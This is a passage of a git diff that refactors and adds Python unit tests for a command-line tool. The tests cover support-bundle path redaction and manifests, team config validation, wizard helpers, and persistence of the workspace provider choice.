paths should be redacted.""" - from scc_cli.support_bundle import redact_paths +class TestPathRedaction: + def test_redact_paths_replaces_home_directory(self) -> None: home = str(Path.home()) - data = {"path": f"{home}/projects/my-repo"} - result = redact_paths(data) + result = redact_paths({"path": f"{home}/projects/my-repo"}) assert home not in result["path"] - assert "~" in result["path"] or "[HOME]" in result["path"] - - def test_redact_paths_handles_nested_paths(self) -> None: - """Nested paths should be redacted.""" - from scc_cli.support_bundle import redact_paths + assert result["path"].startswith("~/") + def test_redact_paths_handles_nested_structures(self) -> None: home = str(Path.home()) - data = { - "workspace": { - "path": f"{home}/dev/secret-project", + result = redact_paths( + { + "workspace": {"path": f"{home}/dev/secret-project"}, + "paths": [f"{home}/one", "./relative/path"], } - } - result = redact_paths(data) + ) assert home not in str(result) + assert result["paths"][1] == "./relative/path" - def test_redact_paths_preserves_relative_paths(self) -> None: - """Relative paths should not be modified.""" - from scc_cli.support_bundle import redact_paths - - data = {"path": "./relative/path"} - result = redact_paths(data) - - assert result["path"] == "./relative/path" - - def test_redact_paths_disabled_with_flag(self) -> None: - """Path redaction can be disabled.""" - from scc_cli.support_bundle import redact_paths - + def test_redact_paths_can_be_disabled(self) -> None: home = str(Path.home()) data = {"path": f"{home}/projects/my-repo"} - result = redact_paths(data, redact=False) - - assert result["path"] == f"{home}/projects/my-repo" + assert redact_paths(data, redact=False) == data -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Bundle Data Collection (Pure Function) -# ═══════════════════════════════════════════════════════════════════════════════ +class TestSupportBundleManifest: + def test_build_support_bundle_manifest_includes_expected_sections(self, tmp_path: Path) -> None: + request = SupportBundleRequest( + output_path=tmp_path / "support-bundle.zip", + redact_paths=False, + workspace_path=None, + ) -class TestBundleDataCollection: - """Test support bundle data collection.""" - - def test_build_bundle_data_includes_system_info(self) -> None: - """Bundle data should include system info.""" - from scc_cli.support_bundle import build_bundle_data - - result = build_bundle_data() - - assert "system" in result - assert "platform" in result["system"] - assert "python_version" in result["system"] - - def test_build_bundle_data_includes_cli_version(self) -> None: - """Bundle data should include CLI version.""" - from scc_cli.support_bundle import build_bundle_data - - result = build_bundle_data() - - assert "cli_version" in result - - def test_build_bundle_data_includes_timestamp(self) -> None: - """Bundle data should include generation timestamp.""" - from scc_cli.support_bundle import build_bundle_data - - result = build_bundle_data() - - assert "generated_at" in result - - def test_build_bundle_data_includes_config(self) -> None: - """Bundle data should include config (redacted).""" - from scc_cli.support_bundle import build_bundle_data + manifest = build_support_bundle_manifest(request, dependencies=_make_dependencies()) - with patch( - "scc_cli.support_bundle.config.load_user_config", - return_value={"selected_profile": "test"}, - ): - result = build_bundle_data() - - assert "config" in result + assert "generated_at" in manifest + assert "cli_version" in manifest + assert "system" in manifest + assert "config" in manifest + assert "org_config" in manifest + assert "doctor" in manifest + assert "launch_audit" in manifest - def test_build_bundle_data_includes_doctor_output(self) -> None: - """Bundle data should include doctor output.""" - from scc_cli.support_bundle import build_bundle_data + def test_doctor_failure_produces_error_in_manifest(self, tmp_path: Path) -> None: + request = SupportBundleRequest( + output_path=tmp_path / "support-bundle.zip", + redact_paths=False, + workspace_path=None, + ) - with patch("scc_cli.support_bundle.run_doctor") as mock_doctor: - from scc_cli.doctor import CheckResult, DoctorResult + manifest = build_support_bundle_manifest( + request, + dependencies=_make_dependencies(doctor_runner=_FailingDoctorRunner()), + ) - mock_doctor.return_value = DoctorResult( - checks=[ - CheckResult(name="Docker", passed=True, message="OK"), - ] + assert manifest["doctor"]["error"] == "Failed to run doctor: Doctor check failed" + + def test_manifest_keeps_launch_audit_summary_when_doctor_fails(self, tmp_path: Path) -> None: + audit_path = tmp_path / "audit" / "launch-events.jsonl" + audit_path.parent.mkdir(parents=True, exist_ok=True) + audit_path.write_text( + serialize_audit_event( + AuditEvent( + event_type="launch.preflight.failed", + message="Launch preflight failed.", + severity=SeverityLevel.ERROR, + subject="claude", + metadata={ + "provider_id": "claude", + "failure_reason": "Provider-core access blocked", + }, + ) ) - result = build_bundle_data() - - assert "doctor" in result - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Use Case with Fake Dependencies -# ═══════════════════════════════════════════════════════════════════════════════ + + "\n", + encoding="utf-8", + ) + request = SupportBundleRequest( + output_path=tmp_path / "support-bundle.zip", + redact_paths=True, + workspace_path=None, + ) + manifest = build_support_bundle_manifest( + request, + dependencies=_make_dependencies( + doctor_runner=_FailingDoctorRunner(), + launch_audit_path=audit_path, + ), + ) -class TestSupportBundleUseCase: - """Test support bundle use case with fake dependencies.""" + assert manifest["doctor"]["error"] == "Failed to run doctor: Doctor check failed" + assert manifest["launch_audit"]["state"] == "available" + assert ( + manifest["launch_audit"]["last_failure"]["failure_reason"] + == "Provider-core access blocked" + ) - def test_doctor_failure_produces_error_in_manifest(self, tmp_path: Path) -> None: - """Doctor failure should be captured as error in manifest.""" - from datetime import datetime, timezone + def test_manifest_includes_bounded_launch_audit_summary(self, tmp_path: Path) -> None: + audit_path = tmp_path / "audit" / "launch-events.jsonl" + audit_path.parent.mkdir(parents=True, exist_ok=True) + lines = [ + serialize_audit_event( + AuditEvent( + event_type="launch.started", + message=f"Launch started {index}", + subject="claude", + metadata={"provider_id": "claude"}, + ) + ) + for index in range(SUPPORT_BUNDLE_AUDIT_LIMIT + 2) + ] + audit_path.write_text("\n".join(lines) + "\n", encoding="utf-8") + request = SupportBundleRequest( + output_path=tmp_path / "support-bundle.zip", + redact_paths=True, + workspace_path=None, + ) - from scc_cli.application.support_bundle import ( - SupportBundleDependencies, - SupportBundleRequest, - build_support_bundle_manifest, + manifest = build_support_bundle_manifest( + request, + dependencies=_make_dependencies(launch_audit_path=audit_path), ) - class FakeFilesystem: - def exists(self, path: Path) -> bool: - return False + assert manifest["launch_audit"]["state"] == "available" + assert len(manifest["launch_audit"]["recent_events"]) == SUPPORT_BUNDLE_AUDIT_LIMIT + assert manifest["launch_audit"]["recent_events"][0]["message"] == ( + f"Launch started {SUPPORT_BUNDLE_AUDIT_LIMIT + 1}" + ) - def read_text(self, path: Path) -> str: - return "{}" - class FakeClock: - def now(self) -> datetime: - return datetime(2024, 1, 1, 0, 0, 0, tzinfo=timezone.utc) +class TestEffectiveEgressSection: + """Tests for the effective_egress section in the support bundle manifest.""" - class FailingDoctorRunner: - def run(self, workspace: str | None = None): - raise RuntimeError("Doctor check failed") + def test_manifest_includes_effective_egress_section(self, tmp_path: Path) -> None: + """Should include effective_egress with runtime_backend, network_policy, sets.""" + from unittest.mock import MagicMock - class FakeArchiveWriter: - def write_manifest(self, output_path: str, manifest_json: str) -> None: - pass + from scc_cli.core.contracts import RuntimeInfo - dependencies = SupportBundleDependencies( - filesystem=FakeFilesystem(), # type: ignore[arg-type] - clock=FakeClock(), # type: ignore[arg-type] - doctor_runner=FailingDoctorRunner(), # type: ignore[arg-type] - archive_writer=FakeArchiveWriter(), # type: ignore[arg-type] + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Desktop", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="27.0.1", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="docker-sandbox", ) + mock_adapters = MagicMock() + mock_adapters.runtime_probe.probe.return_value = mock_info request = SupportBundleRequest( - output_path=tmp_path / "test.zip", + output_path=tmp_path / "support-bundle.zip", redact_paths=False, workspace_path=None, ) - manifest = build_support_bundle_manifest(request, dependencies=dependencies) - - assert "doctor" in manifest - assert "error" in manifest["doctor"] - assert "Doctor check failed" in manifest["doctor"]["error"] + with patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=mock_adapters, + ): + manifest = build_support_bundle_manifest(request, dependencies=_make_dependencies()) + assert "effective_egress" in manifest + egress = manifest["effective_egress"] + assert egress["runtime_backend"] == "docker-sandbox" + assert "anthropic-core" in egress["resolved_destination_sets"] + assert "openai-core" in egress["resolved_destination_sets"] -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Bundle File Creation -# ═══════════════════════════════════════════════════════════════════════════════ + def test_effective_egress_survives_probe_failure(self, tmp_path: Path) -> None: + """Should produce effective_egress even when probe raises.""" + request = SupportBundleRequest( + output_path=tmp_path / "support-bundle.zip", + redact_paths=False, + workspace_path=None, + ) + with patch( + "scc_cli.bootstrap.get_default_adapters", + side_effect=RuntimeError("no docker"), + ): + manifest = build_support_bundle_manifest(request, dependencies=_make_dependencies()) -class TestBundleFileCreation: - """Test support bundle file creation.""" + assert "effective_egress" in manifest + egress = manifest["effective_egress"] + assert egress["runtime_backend"] == "unavailable" + # Destination sets should still resolve even if probe fails + assert isinstance(egress["resolved_destination_sets"], list) - def test_create_bundle_creates_zip_file(self, tmp_path: Path) -> None: - """create_bundle should create a zip file.""" - from scc_cli.support_bundle import create_bundle +class TestSupportBundleArchive: + def test_create_support_bundle_creates_zip_file(self, tmp_path: Path) -> None: output_path = tmp_path / "support-bundle.zip" + request = SupportBundleRequest( + output_path=output_path, + redact_paths=True, + workspace_path=None, + ) - with patch("scc_cli.support_bundle.build_bundle_data", return_value={"test": "data"}): - create_bundle(output_path) + result = create_support_bundle(request, dependencies=_make_dependencies()) assert output_path.exists() assert zipfile.is_zipfile(output_path) + assert "doctor" in result.manifest - def test_create_bundle_contains_manifest(self, tmp_path: Path) -> None: - """Bundle zip should contain manifest.json.""" - from scc_cli.support_bundle import create_bundle - + def test_create_support_bundle_contains_manifest(self, tmp_path: Path) -> None: output_path = tmp_path / "support-bundle.zip" + request = SupportBundleRequest( + output_path=output_path, + redact_paths=True, + workspace_path=None, + ) - with patch("scc_cli.support_bundle.build_bundle_data", return_value={"test": "data"}): - create_bundle(output_path) - - with zipfile.ZipFile(output_path, "r") as zf: - assert "manifest.json" in zf.namelist() - - def test_create_bundle_default_output_path(self) -> None: - """create_bundle should use default path if not specified.""" - from scc_cli.support_bundle import get_default_bundle_path - - result = get_default_bundle_path() - - assert "scc-support-bundle" in str(result) - assert result.suffix == ".zip" - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for JSON Manifest Output -# ═══════════════════════════════════════════════════════════════════════════════ + create_support_bundle(request, dependencies=_make_dependencies()) + with zipfile.ZipFile(output_path, "r") as archive: + assert "manifest.json" in archive.namelist() + manifest = json.loads(archive.read("manifest.json").decode("utf-8")) -class TestJsonManifestOutput: - """Test --json flag for manifest-only output.""" + assert manifest["launch_audit"]["requested_limit"] == SUPPORT_BUNDLE_AUDIT_LIMIT - def test_build_bundle_json_has_correct_kind(self) -> None: - """JSON output should have kind=SupportBundle.""" - from scc_cli.json_output import build_envelope - from scc_cli.kinds import Kind + def test_get_default_support_bundle_path_returns_zip_path(self, tmp_path: Path) -> None: + default_path = get_default_support_bundle_path( + working_directory=tmp_path, + current_time=datetime(2024, 1, 2, 3, 4, 5), + ) - data = {"system": {}, "config": {}} - envelope = build_envelope(Kind.SUPPORT_BUNDLE, data=data) + assert default_path == tmp_path / "scc-support-bundle-20240102-030405.zip" - assert envelope["kind"] == "SupportBundle" - assert envelope["apiVersion"] == "scc.cli/v1" +class TestSupportBundleCommand: def test_json_output_does_not_create_file(self, tmp_path: Path, capsys) -> None: - """--json flag should output manifest, not create zip.""" - from scc_cli.commands.support import support_bundle_cmd + output_path = tmp_path / "support-bundle.zip" - with patch( - "scc_cli.commands.support.build_support_bundle_manifest", - return_value={"test": "data"}, + with ( + patch( + "scc_cli.commands.support.build_default_support_bundle_dependencies", + return_value=object(), + ), + patch( + "scc_cli.commands.support.build_support_bundle_manifest", + return_value={"test": "data"}, + ), ): try: + from scc_cli.commands.support import support_bundle_cmd + support_bundle_cmd( - output=None, + output=str(output_path), json_output=True, pretty=False, no_redact_paths=False, @@ -380,33 +356,29 @@ def test_json_output_does_not_create_file(self, tmp_path: Path, capsys) -> None: except click.exceptions.Exit: pass - captured = capsys.readouterr() - # Should have JSON output to stdout - output = json.loads(captured.out) - assert output["kind"] == "SupportBundle" - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Custom Output Path -# ═══════════════════════════════════════════════════════════════════════════════ - - -class TestCustomOutputPath: - """Test --output flag for custom bundle path.""" - - def test_custom_output_path_creates_file_at_location(self, tmp_path: Path) -> None: - """--output should create bundle at specified path.""" - from scc_cli.commands.support import support_bundle_cmd - - output_path = tmp_path / "custom-bundle.zip" - - with patch( - "scc_cli.commands.support.build_support_bundle_manifest", - return_value={"test": "data"}, + envelope = json.loads(capsys.readouterr().out) + assert envelope["kind"] == "SupportBundle" + assert not output_path.exists() + + def test_command_uses_shared_default_path_helper(self, tmp_path: Path) -> None: + expected_path = tmp_path / "expected-bundle.zip" + + with ( + patch( + "scc_cli.commands.support.get_default_support_bundle_path", + return_value=expected_path, + ), + patch( + "scc_cli.commands.support.build_default_support_bundle_dependencies", + return_value=object(), + ), + patch("scc_cli.commands.support.create_support_bundle") as create_bundle, ): try: + from scc_cli.commands.support import support_bundle_cmd + support_bundle_cmd( - output=str(output_path), + output=None, json_output=False, pretty=False, no_redact_paths=False, @@ -414,26 +386,32 @@ def test_custom_output_path_creates_file_at_location(self, tmp_path: Path) -> No except click.exceptions.Exit: pass - assert output_path.exists() - + request = create_bundle.call_args.args[0] + assert request.output_path == expected_path + assert request.redact_paths is True -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for CLI Integration -# ═══════════════════════════════════════════════════════════════════════════════ + def test_support_app_registers_bundle_command(self) -> None: + from scc_cli.commands.support import support_app + command_names = [cmd.name for cmd in support_app.registered_commands] + assert "bundle" in command_names -class TestSupportBundleCLI: - """Test support bundle CLI integration.""" - def test_support_app_exists(self) -> None: - """support_app Typer should exist.""" - from scc_cli.commands.support import support_app +class TestSupportBundleImportBoundaries: + def test_ui_settings_uses_application_default_path_helper(self) -> None: + source = Path("src/scc_cli/ui/settings.py").read_text(encoding="utf-8") - assert support_app is not None + assert ( + "from scc_cli.application.support_bundle import get_default_support_bundle_path" + in source + ) + assert "from scc_cli.support_bundle import get_default_bundle_path" not in source - def test_support_bundle_command_registered(self) -> None: - """bundle command should be registered on support_app.""" - from scc_cli.commands.support import support_app + def test_production_code_does_not_import_removed_support_bundle_module(self) -> None: + offending_files: list[str] = [] + for path in Path("src").rglob("*.py"): + source = path.read_text(encoding="utf-8") + if "scc_cli.support_bundle" in source: + offending_files.append(str(path)) - command_names = [cmd.name for cmd in support_app.registered_commands] - assert "bundle" in command_names + assert offending_files == [] diff --git a/tests/test_team_cli.py b/tests/test_team_cli.py index dd58b30..e66d20f 100644 --- a/tests/test_team_cli.py +++ b/tests/test_team_cli.py @@ -608,9 +608,14 @@ def fake_resolve(_org_config, team_name): "scc_cli.commands.team.config.load_cached_org_config", return_value={"profiles": {"platform": {}}}, ), - patch("scc_cli.commands.team.normalize_org_config_data", return_value={}), - patch("scc_cli.commands.team.OrganizationConfig.model_validate", return_value=object()), - patch("scc_cli.commands.team.resolve_effective_config", side_effect=fake_resolve), + patch("scc_cli.commands.team_validate.normalize_org_config_data", return_value={}), + patch( + "scc_cli.commands.team_validate.OrganizationConfig.model_validate", + return_value=object(), + ), + patch( + "scc_cli.commands.team_validate.resolve_effective_config", side_effect=fake_resolve + ), ): result = runner.invoke(app, ["team", "validate", "--json"]) assert result.exit_code == 0 diff --git a/tests/test_team_commands_characterization.py b/tests/test_team_commands_characterization.py new file mode 100644 index 0000000..5a23174 --- /dev/null +++ b/tests/test_team_commands_characterization.py @@ -0,0 +1,126 @@ +"""Characterization tests for commands/team.py. + +Lock the current behavior of pure helper functions before S02 surgery: +plugin display formatting, path detection heuristic, and team config +file validation. +""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +from scc_cli.commands.team import ( + _format_plugins_for_display, + _looks_like_path, + _validate_team_config_file, +) + +# ═══════════════════════════════════════════════════════════════════════════════ +# _format_plugins_for_display +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestFormatPluginsForDisplay: + """Plugin list truncation for table display.""" + + def test_empty_list(self) -> None: + result = _format_plugins_for_display([]) + assert result == "-" + + def test_single_plugin(self) -> None: + result = _format_plugins_for_display(["tool@marketplace"]) + assert "tool" in result + + def test_two_plugins_under_limit(self) -> None: + result = _format_plugins_for_display(["a@mp", "b@mp"], max_display=2) + assert "a" in result + assert "b" in result + + def test_truncation_with_count(self) -> None: + plugins = ["a@mp", "b@mp", "c@mp", "d@mp"] + result = _format_plugins_for_display(plugins, max_display=2) + assert "+2 more" in result + + def test_strips_marketplace_suffix(self) -> None: + result = _format_plugins_for_display(["my-plugin@org-marketplace"]) + assert "my-plugin" in result + assert "@" not in result + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _looks_like_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestLooksLikePath: + """Heuristic path detection.""" + + def test_unix_path(self) -> None: + assert _looks_like_path("/etc/config.json") is True + + def test_windows_path(self) -> None: + assert _looks_like_path("C:\\Users\\config.json") is True + + def test_home_tilde(self) -> None: + assert _looks_like_path("~/config.json") is True + + def test_json_extension(self) -> None: + assert _looks_like_path("config.json") is True + + def test_jsonc_extension(self) -> None: + assert _looks_like_path("config.jsonc") is True + + def test_json5_extension(self) -> None: + assert _looks_like_path("config.json5") is True + + def test_plain_name_not_path(self) -> None: + assert _looks_like_path("team-alpha") is False + + def test_url_not_path(self) -> None: + # URLs contain / so they match the heuristic + assert _looks_like_path("https://example.com/config") is True + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _validate_team_config_file +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestValidateTeamConfigFile: + """Team config file validation against schema.""" + + def test_file_not_found(self, tmp_path: Path) -> None: + result = _validate_team_config_file(str(tmp_path / "nonexistent.json"), verbose=False) + assert result["valid"] is False + assert "not found" in result["error"].lower() + assert result["mode"] == "file" + + def test_invalid_json(self, tmp_path: Path) -> None: + bad_file = tmp_path / "bad.json" + bad_file.write_text("{not valid json") + result = _validate_team_config_file(str(bad_file), verbose=False) + assert result["valid"] is False + assert "json" in result["error"].lower() + + def test_valid_config(self, tmp_path: Path) -> None: + config_file = tmp_path / "team.json" + config_data: dict[str, Any] = { + "schema_version": "1.0.0", + "team_name": "test-team", + "profiles": {}, + } + config_file.write_text(json.dumps(config_data)) + result = _validate_team_config_file(str(config_file), verbose=False) + # Note: validity depends on validate_team_config — we lock current behavior + assert result["mode"] == "file" + assert "source" in result + assert isinstance(result["valid"], bool) + + def test_schema_version_included_when_present(self, tmp_path: Path) -> None: + config_file = tmp_path / "team.json" + config_data: dict[str, Any] = {"schema_version": "2.0.0"} + config_file.write_text(json.dumps(config_data)) + result = _validate_team_config_file(str(config_file), verbose=False) + assert result.get("schema_version") == "2.0.0" diff --git a/tests/test_ui_integration.py b/tests/test_ui_integration.py index 310091e..b07fc1e 100644 --- a/tests/test_ui_integration.py +++ b/tests/test_ui_integration.py @@ -15,8 +15,8 @@ from rich.console import Console, RenderableType from scc_cli.application import dashboard as app_dashboard +from scc_cli.application.dashboard import ContainerSummary from scc_cli.application.workspace import WorkspaceContext -from scc_cli.docker.core import ContainerInfo from scc_cli.ports.session_models import SessionListResult, SessionSummary from scc_cli.ui.dashboard import ( Dashboard, @@ -68,7 +68,7 @@ def _container_item( *, status: str = "Up", ) -> ListItem[app_dashboard.DashboardItem]: - container = ContainerInfo(id=container_id, name=name, status=status) + container = ContainerSummary(id=container_id, name=name, status=status) item = app_dashboard.ContainerItem(label=name, description=description, container=container) return ListItem(value=item, label=name, description=description) diff --git a/tests/test_validate.py b/tests/test_validate.py index 047e6c7..20b0c6a 100644 --- a/tests/test_validate.py +++ b/tests/test_validate.py @@ -39,7 +39,7 @@ def valid_org_config(): }, "defaults": { "allowed_plugins": ["core-*"], - "network_policy": "unrestricted", + "network_policy": "open", }, } diff --git a/tests/test_wizard_characterization.py b/tests/test_wizard_characterization.py new file mode 100644 index 0000000..c631ee7 --- /dev/null +++ b/tests/test_wizard_characterization.py @@ -0,0 +1,97 @@ +"""Characterization tests for ui/wizard.py. + +Lock current behavior of pure helpers: path normalization, answer +construction, and workspace source option building. +""" + +from __future__ import annotations + +from pathlib import Path + +from scc_cli.ui.wizard import ( + StartWizardAction, + StartWizardAnswerKind, + _answer_back, + _answer_cancelled, + _answer_selected, + _normalize_path, +) + +# ══════════════════════════════════════════���══════════════════════════════════��═ +# _normalize_path +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestNormalizePath: + """Path display normalization for wizard UI.""" + + def test_home_prefix_collapsed(self) -> None: + home = str(Path.home()) + result = _normalize_path(f"{home}/projects/api") + assert result.startswith("~") + assert "api" in result + + def test_non_home_path_unchanged(self) -> None: + result = _normalize_path("/opt/data/files") + assert result == "/opt/data/files" + + def test_long_path_truncated(self) -> None: + home = str(Path.home()) + long_path = f"{home}/very/deeply/nested/path/structure/with/many/levels/to/project" + result = _normalize_path(long_path) + assert "…" in result + # Preserves last 2 segments + assert "to/project" in result + + def test_short_relative_path_under_home(self) -> None: + home = str(Path.home()) + result = _normalize_path(f"{home}/dev") + assert result == "~/dev" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# StartWizardAnswer construction +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestStartWizardAnswer: + """Answer factory functions produce correct kinds.""" + + def test_cancelled(self) -> None: + answer = _answer_cancelled() + assert answer.kind == StartWizardAnswerKind.CANCELLED + assert answer.value is None + + def test_back(self) -> None: + answer = _answer_back() + assert answer.kind == StartWizardAnswerKind.BACK + assert answer.value is None + + def test_selected(self) -> None: + answer = _answer_selected("some_value") + assert answer.kind == StartWizardAnswerKind.SELECTED + assert answer.value == "some_value" + + def test_selected_with_enum(self) -> None: + answer = _answer_selected(StartWizardAction.NEW_SESSION) + assert answer.kind == StartWizardAnswerKind.SELECTED + assert answer.value == StartWizardAction.NEW_SESSION + + +# ═════════════════════════════════════════════���═════════════════════════════════ +# StartWizardAction enum +# ════════════════════════════════════════════��══════════════════════════════════ + + +class TestStartWizardAction: + """Wizard action enum values are stable.""" + + def test_action_values(self) -> None: + assert StartWizardAction.NEW_SESSION.value == "new_session" + assert StartWizardAction.TOGGLE_ALL_TEAMS.value == "toggle_all_teams" + assert StartWizardAction.SWITCH_TEAM.value == "switch_team" + + def test_answer_kind_values(self) -> None: + assert StartWizardAnswerKind.SELECTED.value == "selected" + assert StartWizardAnswerKind.BACK.value == "back" + assert StartWizardAnswerKind.CANCELLED.value == "cancelled" diff --git a/tests/test_workspace_local_provider_prefs.py b/tests/test_workspace_local_provider_prefs.py new file mode 100644 index 0000000..d4f8f7d --- /dev/null +++ b/tests/test_workspace_local_provider_prefs.py @@ -0,0 +1,98 @@ +"""Tests for workspace-local provider preferences.""" + +from __future__ import annotations + +import json +from pathlib import Path +from unittest.mock import MagicMock, patch + +from scc_cli.workspace_local_config import ( + WORKSPACE_CONFIG_DIRNAME, + WORKSPACE_CONFIG_FILENAME, + get_workspace_last_used_provider, + get_workspace_local_config_path, + set_workspace_last_used_provider, +) + + +def test_workspace_config_path_points_to_local_scc_file(tmp_path: Path) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + + assert get_workspace_local_config_path(workspace) == ( + workspace / WORKSPACE_CONFIG_DIRNAME / WORKSPACE_CONFIG_FILENAME + ) + + +def test_workspace_last_used_provider_defaults_to_none(tmp_path: Path) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + + assert get_workspace_last_used_provider(workspace) is None + + +def test_set_workspace_last_used_provider_persists_local_state(tmp_path: Path) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + + set_workspace_last_used_provider(workspace, "codex") + + path = get_workspace_local_config_path(workspace) + on_disk = json.loads(path.read_text(encoding="utf-8")) + assert on_disk["last_used_provider"] == "codex" + assert get_workspace_last_used_provider(workspace) == "codex" + + +def test_set_workspace_last_used_provider_preserves_other_local_keys(tmp_path: Path) -> None: + workspace = tmp_path / "repo" + path = workspace / WORKSPACE_CONFIG_DIRNAME / WORKSPACE_CONFIG_FILENAME + path.parent.mkdir(parents=True) + path.write_text( + json.dumps({"last_used_provider": "claude", "other_local_setting": True}), + encoding="utf-8", + ) + + set_workspace_last_used_provider(workspace, "codex") + + on_disk = json.loads(path.read_text(encoding="utf-8")) + assert on_disk["last_used_provider"] == "codex" + assert on_disk["other_local_setting"] is True + + +@patch("scc_cli.workspace_local_config.subprocess.run") +def test_setting_workspace_provider_best_effort_updates_git_exclude( + mock_run: MagicMock, tmp_path: Path +) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + exclude_path = workspace / ".git" / "info" / "exclude" + + def _side_effect(cmd: list[str], **_kwargs: object) -> MagicMock: + result = MagicMock() + result.returncode = 0 + if "rev-parse" in cmd: + result.stdout = f"{exclude_path}\n" + else: + result.stdout = "" + return result + + mock_run.side_effect = _side_effect + + set_workspace_last_used_provider(workspace, "codex") + + assert mock_run.call_count == 1 + assert exclude_path.read_text(encoding="utf-8").splitlines() == [".scc/"] + + +@patch("scc_cli.workspace_local_config.subprocess.run") +def test_setting_workspace_provider_ignores_git_exclude_failures( + mock_run: MagicMock, tmp_path: Path +) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + + mock_run.side_effect = OSError("git unavailable") + + set_workspace_last_used_provider(workspace, "claude") + + assert get_workspace_last_used_provider(workspace) == "claude" diff --git a/tests/test_workspace_provider_persistence.py b/tests/test_workspace_provider_persistence.py new file mode 100644 index 0000000..fd89f25 --- /dev/null +++ b/tests/test_workspace_provider_persistence.py @@ -0,0 +1,530 @@ +"""Tests for workspace provider preference persistence edge cases. + +Verifies: +- set_workspace_last_used_provider is called ONLY after finalize_launch succeeds +- KEEP_EXISTING conflict path writes workspace preference +- Cancelled / failed launches do NOT write workspace preference +- _resolve_prompt_default returns correct preselection for ask+last-used +""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.application.start_session import StartSessionPlan +from scc_cli.commands.launch.conflict_resolution import ( + LaunchConflictDecision, + LaunchConflictResolution, +) +from scc_cli.commands.launch.preflight import ( + AuthStatus, + ImageStatus, + LaunchReadiness, + ProviderResolutionSource, +) +from scc_cli.commands.launch.provider_choice import _resolve_prompt_default +from scc_cli.core.contracts import AuthReadiness, ProviderCapabilityProfile +from scc_cli.core.errors import SandboxLaunchError +from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.models import MountSpec, SandboxSpec + +# ────────────────────────────────────────────────────────────────────────────── +# Fixtures +# ────────────────────────────────────────────────────────────────────────────── + + +def _build_plan(tmp_path: Path, *, provider_id: str = "codex") -> StartSessionPlan: + resolver = ResolverResult( + workspace_root=tmp_path, + entry_dir=tmp_path, + mount_root=tmp_path, + container_workdir=str(tmp_path), + is_auto_detected=False, + is_suspicious=False, + reason="explicit", + ) + sandbox_spec = SandboxSpec( + image=f"scc-agent-{provider_id}:latest", + workspace_mount=MountSpec(source=tmp_path, target=tmp_path), + workdir=tmp_path, + provider_id=provider_id, + ) + return StartSessionPlan( + resolver_result=resolver, + workspace_path=tmp_path, + team=None, + session_name="demo", + resume=False, + fresh=False, + current_branch="main", + effective_config=None, + sync_result=None, + sync_error_message=None, + agent_settings=None, + sandbox_spec=sandbox_spec, + agent_launch_spec=None, + ) + + +def _build_dependencies(*, provider_id: str = "codex") -> MagicMock: + provider = MagicMock() + provider.capability_profile.return_value = ProviderCapabilityProfile( + provider_id=provider_id, + display_name=provider_id.capitalize(), + required_destination_set=None, + supports_resume=False, + supports_skills=True, + supports_native_integrations=True, + ) + provider.auth_check.return_value = AuthReadiness( + status="present", mechanism="auth_json_file", guidance=None + ) + deps = MagicMock() + deps.agent_provider = provider + return deps + + +def _build_adapters() -> MagicMock: + adapters = MagicMock() + adapters.sandbox_runtime.ensure_available.return_value = None + adapters.filesystem = MagicMock() + adapters.personal_profile_service.workspace_has_overrides.return_value = False + return adapters + + +def _invoke_start(tmp_path: Path, *, provider: str = "codex") -> None: + from scc_cli.commands.launch.flow import start + + start( + workspace=str(tmp_path), + team=None, + session_name="demo", + resume=False, + select=False, + worktree_name=None, + fresh=False, + install_deps=False, + offline=False, + standalone=True, + dry_run=False, + json_output=False, + pretty=False, + non_interactive=False, + debug=False, + allow_suspicious_workspace=False, + provider=provider, + ) + + +# ────────────────────────────────────────────────────────────────────────────── +# Shared decorator stacks +# ────────────────────────────────────────────────────────────────────────────── + +_FLOW_BASE_PATCHES = [ + "scc_cli.commands.launch.flow.setup.is_setup_needed", + "scc_cli.commands.launch.flow.config.load_user_config", + "scc_cli.commands.launch.flow.get_default_adapters", + "scc_cli.commands.launch.flow.sessions.get_session_service", + "scc_cli.commands.launch.flow.validate_and_resolve_workspace", + "scc_cli.commands.launch.flow.prepare_workspace", + "scc_cli.commands.launch.flow.resolve_workspace_team", + "scc_cli.commands.launch.flow.resolve_launch_provider", + "scc_cli.commands.launch.flow.prepare_live_start_plan", + "scc_cli.commands.launch.flow.build_sync_output_view_model", + "scc_cli.commands.launch.flow.render_launch_output", + "scc_cli.commands.launch.flow._apply_personal_profile", + "scc_cli.commands.launch.flow.warn_if_non_worktree", + "scc_cli.commands.launch.flow.resolve_launch_conflict", + "scc_cli.commands.launch.flow._record_session_and_context", + "scc_cli.commands.launch.flow.set_workspace_last_used_provider", + "scc_cli.commands.launch.flow.collect_launch_readiness", + "scc_cli.commands.launch.flow.ensure_launch_ready", + "scc_cli.commands.launch.flow.show_auth_bootstrap_panel", + "scc_cli.commands.launch.flow.show_launch_panel", + "scc_cli.commands.launch.flow.finalize_launch", +] + + +def _apply_flow_patches( + tmp_path: Path, + *, + provider_id: str = "codex", + conflict_decision: LaunchConflictDecision = LaunchConflictDecision.PROCEED, + finalize_side_effect: Exception | None = None, +) -> dict[str, MagicMock]: + """Create a dict of mock names → MagicMock with sensible defaults.""" + plan = _build_plan(tmp_path, provider_id=provider_id) + 